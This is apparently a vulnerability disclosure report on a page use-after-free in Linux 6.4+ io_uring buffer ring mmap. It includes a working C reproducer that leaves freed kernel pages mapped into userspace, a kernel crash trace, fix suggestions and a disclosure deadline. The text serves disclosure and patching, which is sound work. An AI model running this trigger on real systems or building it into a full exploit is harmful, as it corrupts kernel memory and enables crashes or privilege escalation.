Linux >=6.4: io_uring: page UAF via buffer ring mmap  
Since commit c56e022c0a27 (\"io_uring: add support for user mapped provided  
buffer ring\"), landed in Linux 6.4, io_uring makes it possible to allocate,  
mmap, and deallocate \"buffer rings\".  
A \"buffer ring\" can be allocated with  
io_uring_register(..., IORING_REGISTER_PBUF_RING, ...) and later deallocated  
with io_uring_register(..., IORING_UNREGISTER_PBUF_RING, ...).  
It can be mapped into userspace using mmap() with offset  
IORING_OFF_PBUF_RING|..., which creates a VM_PFNMAP mapping, meaning the MM  
subsystem will treat the mapping as a set of opaque page frame numbers not  
associated with any corresponding pages; this implies that the calling code is  
responsible for ensuring that the mapped memory can not be freed before the  
userspace mapping is removed.  
However, there is no mechanism to ensure this in io_uring: It is possible to  
just register a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then  
free the buffer ring's pages with IORING_UNREGISTER_PBUF_RING, leaving free  
pages mapped into userspace, which is a fairly easily exploitable situation.  
#define _GNU_SOURCE  
#include <unistd.h>  
#include <err.h>  
#include <string.h>  
#include <stdio.h>  
#include <ctype.h>  
#include <sys/syscall.h>  
#include <sys/mman.h>  
#include <linux/io_uring.h>  
#define SYSCHK(x) ({ \\  
typeof(x) __res = (x); \\  
if (__res == (typeof(x))-1) \\  
err(1, \"SYSCHK(\" #x \")\"); \\  
__res; \\  
int main(void) {  
struct io_uring_params params = {  
int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));  
printf(\"uring_fd = %d\  
\", uring_fd);  
struct io_uring_buf_reg reg = {  
.ring_entries = 1,  
.bgid = 0,  
SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, &reg, 1));  
void *pbuf_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_PBUF_RING));  
printf(\"pbuf mapped at %p\  
\", pbuf_mapping);  
struct io_uring_buf_reg unreg = { .bgid = 0 };  
SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, &unreg, 1));  
while (1) {  
memset(pbuf_mapping, 0xaa, 0x1000);  
When run on a system with the debug options:  
, this will splat with the following error, when __page_table_check_zero()  
detects that a page that's being freed is still mapped into userspace:  
------------[ cut here ]------------  
kernel BUG at mm/page_table_check.c:146!  
invalid opcode: 0000 [#1] PREEMPT SMP KASAN  
CPU: 1 PID: 554 Comm: uring-mmap-pbuf Not tainted 6.7.0-rc3 #360  
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014  
RIP: 0010:__page_table_check_zero+0x136/0x150  
Code: a8 40 0f 84 1f ff ff ff 48 8d 7b 48 e8 93 8a fd ff 48 8b 6b 48 40 f6 c5 01 0f 84 08 ff ff ff 48 83 ed 01 e9 02 ff ff ff 0f 0b <0f> 0b 0f 0b 0f 0b 5b 48 89 ef 5d 41 5c 41 5d 41 5e e9 f4 ea ff ff  
RSP: 0018:ffff888029aa7c70 EFLAGS: 00010202  
RAX: 0000000000000001 RBX: ffff8880011789f0 RCX: dffffc0000000000  
RDX: 0000000000000007 RSI: ffffffff83ca598e RDI: ffff8880011789f4  
RBP: ffff8880011789f0 R08: 0000000000000000 R09: ffffed100022f13e  
R10: ffff8880011789f7 R11: 0000000000000000 R12: 0000000000000000  
R13: ffff8880011789f4 R14: 0000000000000001 R15: 0000000000000000  
FS: 00007f745f01a500(0000) GS:ffff88806d280000(0000) knlGS:0000000000000000  
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033  
CR2: 00005610bbfb8008 CR3: 0000000016ac3004 CR4: 0000000000770ef0  
PKRU: 55555554  
Call Trace:  
RIP: 0033:0x7f745ef4bf59  
Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 07 6f 0c 00 f7 d8 64 89 01 48  
RSP: 002b:00007ffe29cbac98 EFLAGS: 00000202 ORIG_RAX: 00000000000001ab  
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f745ef4bf59  
RDX: 00007ffe29cbaca0 RSI: 0000000000000017 RDI: 0000000000000003  
RBP: 00007ffe29cbadb0 R08: 00007ffe29cbab6c R09: 0000000000000000  
R10: 0000000000000001 R11: 0000000000000202 R12: 00005610bbb700d0  
R13: 00007ffe29cbae90 R14: 0000000000000000 R15: 0000000000000000  
Modules linked in:  
---[ end trace 0000000000000000 ]---  
When run on a system without those options, this reproducer will randomly  
corrupt memory and probably on most runs crash the machine.  
I tried it once and after I tried using some other programs, I got some random  
kernel #GP fault.  
One way to fix this might be to add some mapping counter to  
`struct io_buffer_list`, and then:  
- increment that counter in io_uring_validate_mmap_request() for PBUF_RING  
- increment that counter in the vm_area_operations ->open() handler  
- decrement that counter in the vm_area_operations ->close() handler  
- refuse IORING_UNREGISTER_PBUF_RING if the counter is non-zero?  
Or alternatively free the io_buffer_list when the counter drops to zero, and let  
the counter start at 1.  
(I'm not sure what the lifetime rules for other accesses to the io_buffer_list's  
memory are - it looks like most paths only access the io_buffer_list under some  
lock? Is the idea that the kernel actually accesses the buffer through userspace  
pointers, or something like that? I'll have to stare at this some more before I  
understand it...)  
This bug is subject to a 90-day disclosure deadline. If a fix for this  
issue is made available to users before the end of the 90-day deadline,  
this bug report will become public 30 days after the fix was made  
available. Otherwise, this bug report will become public at the deadline.  
The scheduled deadline is 2024-02-26.  
Found by: